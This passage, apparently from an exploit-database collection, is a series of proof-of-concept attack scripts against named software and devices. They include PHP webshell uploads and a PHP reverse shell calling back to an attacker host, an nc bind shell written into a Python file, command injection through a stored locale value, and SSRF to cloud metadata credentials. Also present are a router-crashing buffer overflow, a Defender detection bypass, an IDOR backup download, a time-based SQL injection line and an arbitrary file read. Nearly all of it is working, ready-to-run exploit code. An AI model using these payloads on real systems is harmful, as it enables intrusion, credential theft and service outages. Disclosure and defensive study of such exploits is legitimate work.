        return zip_filename
    except Exception as e:
        print(f"[!] Error creating zip file: {e}")
        sys.exit(1)


def main(base_url, command):
    if not base_url.endswith('/'):
        base_url += '/'
    zip_filename = None
    driver = None  # so the finally block is safe if Firefox never started
    check_geckodriver()
    try:
        firefox_options = FirefoxOptions()
        firefox_options.add_argument("--headless")
        script_directory = os.path.dirname(os.path.abspath(__file__))
        geckodriver_path = os.path.join(script_directory, 'geckodriver')
        service = FirefoxService(executable_path=geckodriver_path)
        driver = webdriver.Firefox(service=service, options=firefox_options)
        print("[*] Exploit initiated.")

        # Login
        driver.get(base_url + "admin/login")
        print("[*] Accessing login page...")
        driver.find_element(By.NAME, "email").send_keys(f"{email}")
        driver.find_element(By.NAME, "password").send_keys(f"{password}")
        driver.find_element(By.ID, "login_submit").click()
        print("[*] Credentials submitted...")
        try:
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
            if error_message.is_displayed():
                print("[!] Login failed: Invalid credentials.")
                driver.quit()
                sys.exit(1)
        except NoSuchElementException:
            print("[+] Login successful.")

        # File creation
        print("[*] Preparing exploit files...")
        php_code = f"<?php echo system('{command}'); ?>"
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)
        driver.get(base_url + "admin/upgrade")
        print("[*] Uploading exploit payload...")
        file_input = driver.find_element(By.ID, "file_upload")
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

        # Uploading
        driver.find_element(By.ID, "submit").click()
        WebDriverWait(driver, 10).until(EC.alert_is_present())
        alert = driver.switch_to.alert
        alert.accept()

        # Exploit result
        exploit_url = base_url + "exploit.php"
        response = requests.get(exploit_url)
        print(f"[+] Exploit response:\n\n{response.text}")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        if driver is not None:
            driver.quit()
        if zip_filename and os.path.exists(zip_filename):
            os.remove(zip_filename)


if __name__ == "__main__":
    entryy()
    if len(sys.argv) < 3:
        print("Usage: python script.py [BASE_URL] [COMMAND]")
    else:
        main(sys.argv[1], sys.argv[2])
-
TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

# Description:
# There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.

# Usage:
# python3 target username password
# change port, if required

------------------------------------------------POC-----------------------------------------

#!/usr/bin/python3
import requests
from requests.auth import HTTPBasicAuth
import base64


def send_request(ip, username, password):
    auth_url = f"http://{ip}:8082"
    # Oversized ping_addr value sent to the diagnostics page
    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
    credentials = f"{username}:{password}"
    encoded_credentials = base64.b64encode(credentials.encode()).decode()
    headers = {
        "Host": f"{ip}:8082",
        "Authorization": f"Basic {encoded_credentials}",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    session = requests.Session()
    response = session.get(target_url, headers=headers)
    if response.status_code == 200:
        print("Server Crashed")
        print(response.text)
    else:
        print(f"Script Completed with status code {response.status_code}")


ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")
send_request(ip_address, username, password)
-
DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Date: 7/28/2022
# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
# Vendor Homepage: https://www.f-logic.jp
# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
# Version: Ver1.0
# Tested on: DataCube3 version 1.0 (Ubuntu)
# CVE : CVE-2024-25830 + CVE-2024-25832
# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
import re

urllib3.disable_warnings()


def banner():
    dataCube3Logo = """
    ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
    ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓
    ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
    ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
    ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
    ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓
    ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓
    ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓
    ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓
    \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
    \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
    FOR EDUCATIONAL PURPOSE ONLY.
    """
    return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))


def extractRootPwd(RHOST, RPORT, protocol):
    # CVE-2024-25830: config_all.php leaks the configuration (including passwords) without authentication
    url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
    try:
        response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
        if response.status_code != 302:
            print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
            exit()
        soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
        scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
        rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
        jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
        adminPassword = jsonLeakedData[12]['value']
        rootPassword = jsonLeakedData[14]['value']
        print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
        return rootPassword
    except:
        print('[ERROR] Can\'t grab the DataCube3 version...')


def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
    print('[INFO] Generating DataCube3 auth cookie ...')
    url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
    data = {
        'user_id': 'root',
        'user_pw': rootPassword,
        'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
    }
    try:
        response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
        if response.status_code != 302:
            print('[!] \033[1;91mError: An error occurred while trying to get the auth cookie, is the root password correct?\033[1;m')
            exit()
        authCookie = response.cookies.get_dict()
        print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
        return authCookie
    except:
        print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')


def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
    print('[INFO] Extracting Accesstime ...')
    url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
    try:
        response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
        if response.status_code != 302:
            print('[!] \033[1;91mError: An error occurred while trying to get the accesstime value.\033[1;m')
            exit()
        soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
        accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
        print('[INFO] AccessTime value: {}'.format(accessTime))
        return accessTime
    except:
        print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')


def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
    # CVE-2024-25832: the photo upload form does not validate the file type, so a .php file is stored as-is
    print('[INFO] Injecting PHP reverse shell script ...')
    filename = 'rvs.php'
    payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)
    data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)
    headers = {
        'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
    }
    url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
    try:
        response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
        if response.status_code != 302:
            print('[!] \033[1;91mError: An error occurred while trying to upload the PHP reverse shell script.\033[1;m')
            exit()
        shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
        print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
        return shellURL
    except:
        print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')


def execReverseShell(shellURL):
    print('[INFO] Executing reverse shell...')
    try:
        response = requests.get(shellURL, allow_redirects=False, verify=False)
        print('[INFO] Reverse shell successfully executed.')
        return
    except Exception as e:
        print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
        return False


def main():
    banner()
    args = parser.parse_args()
    protocol = 'https' if args.RPORT == 443 else 'http'
    rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
    authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
    accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
    shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
    execReverseShell(shellURL)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
    parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
    parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
    parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
    parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
    main()
-
Numbas < v7.3 - Remote Code Execution
# Exploit Title: Numbas < v7.3 - Remote Code Execution
# Google Dork: N/A
# Date: March 7th, 2024
# Exploit Author: Matheus Boschetti
# Vendor Homepage: https://www.numbas.org.uk/
# Software Link: https://github.com/numbas/Numbas
# Version: 7.2 and below
# Tested on: Linux
# CVE: CVE-2024-27612

import sys, requests, re, argparse, subprocess, time
from bs4 import BeautifulSoup

s = requests.session()


def getCSRF(target):
    url = f"http://{target}/"
    req = s.get(url)
    soup = BeautifulSoup(req.text, 'html.parser')
    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
    return csrfmiddlewaretoken


def createTheme(target):
    # Format request
    csrfmiddlewaretoken = getCSRF(target)
    theme = 'ExampleTheme'
    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
    data = (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
        '\r\n'
        f'{csrfmiddlewaretoken}\r\n'
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="name"\r\n'
        '\r\n'
        f'{theme}\r\n'
        f'--{boundary}--\r\n'
    )
    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}', 'User-Agent': 'Mozilla/5.0', 'Accept': '*/*', 'Connection': 'close'}

    # Create theme and return its ID
    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
    redir = req.url
    split = redir.split('/')
    id = split[4]
    print(f"\t[i] Theme created with ID {id}")
    return id


def login(target, user, passwd):
    print("\n[i] Attempting to login...")
    csrfmiddlewaretoken = getCSRF(target)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'username': user, 'password': passwd, 'next': '/'}

    # Login
    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
    res = login.text
    if("Logged in as" not in res):
        print("\n\n[!] Login failed!")
        sys.exit(-1)

    # Check if logged and fetch ID
    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
    if usermatch:
        user = usermatch.group(1)
    idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
    if idmatch:
        id = idmatch.group(1)
    print(f"\t[+] Logged in as \"{user}\" with ID {id}")


def checkVuln(url):
    print("[i] Checking if target is vulnerable...")

    # Attempt to read files (path traversal in the theme source editor)
    themeID = createTheme(url)
    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
    hname = s.get(f"{target}/etc/hostname")
    ver = s.get(f"{target}/etc/issue")
    hnamesoup = BeautifulSoup(hname.text, 'html.parser')
    versoup = BeautifulSoup(ver.text, 'html.parser')
    hostname = hnamesoup.find('textarea').get_text().strip()
    version = versoup.find('textarea').get_text().strip()
    if len(hostname) < 1:
        print("\n\n[!] Something went wrong - target might not be vulnerable.")
        sys.exit(-1)
    print(f"\n[+] Target \"{hostname}\" is vulnerable!")
    print(f"\t[i] Running: \"{version}\"")

    # Cleanup - delete theme
    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
    target = f"http://{url}/themes/{themeID}/delete"
    csrfmiddlewaretoken = getCSRF(url)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken}
    s.post(target, data=data)


def replaceInit(target):
    # Overwrite __init__.py with arbitrary code
    rport = '8443'
    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
    csrfmiddlewaretoken = getCSRF(target)
    filename = '../../../../numbas_editor/numbas/__init__.py'
    themeID = createTheme(target)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'source': payload, 'filename': filename}
    print("[i] Delivering payload...")

    # Retry 5 times in case something goes wrong...
    for attempt in range(5):
        try:
            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
        except Exception as e:
            pass

    # Establish connection to bind shell
    time.sleep(2)
    print(f"\t[+] Payload delivered, establishing connection...\n")
    if ":" in target:
        split = target.split(":")
        ip = split[0]
    else:
        ip = str(target)
    subprocess.Popen(["nc", "-n", ip, rport])
    while True:
        pass


def main():
    parser = argparse.ArgumentParser()
    if len(sys.argv) <= 1:
        print("\n[!] No option provided!")
        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
        sys.exit(-1)
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
    parser.add_argument('--target', help='Target IP:PORT')
    parser.add_argument('--user', help='Username to authenticate')
    parser.add_argument('--passwd', help='Password to authenticate')
    args = parser.parse_args()
    action = args.action
    target = args.target
    user = args.user
    passwd = args.passwd
    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")
    if action == 'check':
        login(target, user, passwd)
        checkVuln(target)
    elif action == 'exploit':
        login(target, user, passwd)
        replaceInit(target)
    else:
        sys.exit(-1)


if __name__ == "__main__":
    main()
-
Akaunting < 3.1.3 - RCE
# Exploit Title: Akaunting < 3.1.3 - RCE
# Date: 08/02/2024
# Exploit Author: u32i@proton.me
# Vendor Homepage: https://akaunting.com
# Software Link: https://github.com/akaunting/akaunting
# Version: <= 3.1.3
# Tested on: Ubuntu (22.04)
# CVE : CVE-2024-22836

#!/usr/bin/python3

import sys
import re
import requests
import argparse


def get_company():
    # print("[INF] Retrieving company id...")
    res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
    if res.status_code != 302:
        print("[ERR] No company id was found!")
        sys.exit(3)
    cid = res.headers['Location'].split('/')[-1]
    if cid == "login":
        print("[ERR] Invalid session cookie!")
        sys.exit(7)
    return cid


def get_tokens(url):
    res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
    search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)
    if not search_res:
        print("[ERR] Couldn't get csrf token")
        sys.exit(1)
    data = {}
    data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')
    data['session'] = res.cookies.get('akaunting_session')
    return data


def inject_command(cmd):
    # The 'locale' value is stored unsanitized and later interpolated into a shell command
    url = f"{target}/{company_id}/wizard/companies"
    tokens = get_tokens(url)
    headers.update({"X-Csrf-Token": tokens['csrf_token']})
    data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
    res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
    if res.status_code == 200:
        res_data = res.json()
        if res_data['error']:
            print("[ERR] Command injection failed!")
            sys.exit(4)
    print("[INF] Command injected!")


def trigger_rce(app, version="1.0.0"):
    # Installing an app runs the command that embeds the stored locale
    print("[INF] Executing the command...")
    url = f"{target}/{company_id}/apps/install"
    data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
    headers.update({"Content-Type": "application/json"})
    res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
    if res.status_code == 200:
        res_data = res.json()
        if res_data['error']:
            search_res = re.search(r">Exit Code\:.*<", res_data['message'])
            if search_res:
                print("[ERR] Failed to execute the command")
                sys.exit(6)
            print("[ERR] Failed to install the app! no command was executed!")
            sys.exit(5)
    print("[INF] Executed successfully!")


def login(email, password):
    url = f"{target}/auth/login"
    tokens = get_tokens(url)
    cookies.update({'akaunting_session': tokens['session']})
    data = {
        "_token": tokens['csrf_token'],
        "_method": "POST",
        "email": email,
        "password": password
    }
    req = requests.post(url, headers=headers, cookies=cookies, data=data)
    res = req.json()
    if res['error']:
        print("[ERR] Failed to log in!")
        sys.exit(8)
    print("[INF] Logged in")
    cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})


def main():
    inject_command(args.command)
    trigger_rce(args.alias, args.version)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="target url")
    parser.add_argument("--email", help="user login email.")
    parser.add_argument("--password", help="user login password.")
    parser.add_argument("-i", "--id", type=int, help="company id (optional).")
    parser.add_argument("-c", "--command", help="command to execute.")
    parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
    parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
    args = parser.parse_args()
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
    cookies = {}
    target = args.url
    try:
        login(args.email, args.password)
        company_id = get_company() if not args.id else args.id
        main()
    except:
        sys.exit(0)
-
Ladder v0.0.21 - Server-side request forgery (SSRF)
# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
# Date: 2024-01-20
# Exploit Author: @_chebuya
# Software Link: https://github.com/everywall/ladder
# Version: v0.0.1 - v0.0.21
# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
# CVE: CVE-2024-27620
# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs.

import requests
import json

target_url = "http://127.0.0.1:8080/api/"
# Ladder fetches whatever URL is appended to /api/, here the EC2 instance metadata endpoint
imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"

r = requests.get(target_url + imdsv1_url)
response_json = json.loads(r.text)
print(response_json["body"])
-
Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G

[CVE Reference]
N/A

[Security Issue]
Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.

Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message.

Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml, but that has since been mitigated. However, I discovered that using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing.

[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt

[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
Access is denied.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)

Multi-commas, for the Win!

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
February 7, 2024: Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR
#!/usr/bin/python3
#
# Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
# CVE: CVE-2023-5808
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04

import argparse
from datetime import datetime
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-5808 PoC",
    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
)

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
)

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
)

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
)

args = parser.parse_args()


def download_file(hostname, jsessionid, jsessionidsso):
    # Set the filename:
    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID": jsessionid,
        "JSESSIONIDSSO": jsessionidsso
    }

    # GET request headers:
    smu_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Dnt": "1",
        "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Te": "trailers",
        "Connection": "close"
    }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"(unknown) has been downloaded to {getcwd()}")


if __name__ == "__main__":
    download_file(args.host, args.id, args.sso)
-
Hide My WP < 6.2.9 - Unauthenticated SQLi
# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
-
Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier - Arbitrary File Read
# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
# Google Dork: [not]
# Date: [12/28/2023]
# Exploit Author: [Youssef Muhammad]
# Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
# Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier]
# Tested on: [Windows, Linux]
# CVE : [CVE-2023-26360]

import sys
import requests
import json

BANNER = """
██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████
██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██
█████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██
██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████
"""

RED_COLOR = "\033[91m"
GREEN_COLOR = "\033[42m"
RESET_COLOR = "\033[0m"


def print_banner():
    print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR)
    return 0


def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
    if not endpoint.endswith('.cfc'):
        endpoint += '.cfc'
    if target_file.endswith('.cfc'):
        raise ValueError('The TARGET_FILE must not point to a .cfc')

    # The deserialized _metadata.classname is resolved as a path, so the target file is read as a "component"
    targeted_file = f"a/{target_file}"
    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})
    vars_get = {'method': 'test', '_cfclient': 'true'}
    uri = f'{host}{endpoint}'
    response = requests.post(
        uri,
        params=vars_get,
        data={'_variables': json_variables},
        proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None
    )

    file_data = None
    # The file contents precede this marker in the error page
    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'
    if response.status_code in [404, 500] and splatter in response.text:
        file_data = response.text.split(splatter, 1)[0]
    if file_data is None:
        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')

    print(file_data)

    # Save the output to a file
    output_file_name = 'output.txt'
    with open(output_file_name, 'w') as output_file:
        output_file.write(file_data)
    print(f"The output saved to {output_file_name}")


if __name__ == "__main__":
    if not 3 <= len(sys.argv) <= 5:
        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
        sys.exit(1)

    print_banner()
    host = sys.argv[1]
    target_file = sys.argv[2]
    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None

    try:
        run_exploit(host, target_file, endpoint, proxy_url)
    except Exception as e:
        print(f"Error: {e}")
-
WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover
# Google Dork: inurl:("plugins/duplicator/")
# Date: 2023-12-04
# Exploit Author: Dmitrii Ignatyev
# Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: 1.5.7.1
# Tested on: Wordpress 6.4
# CVE : CVE-2023-6114
# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
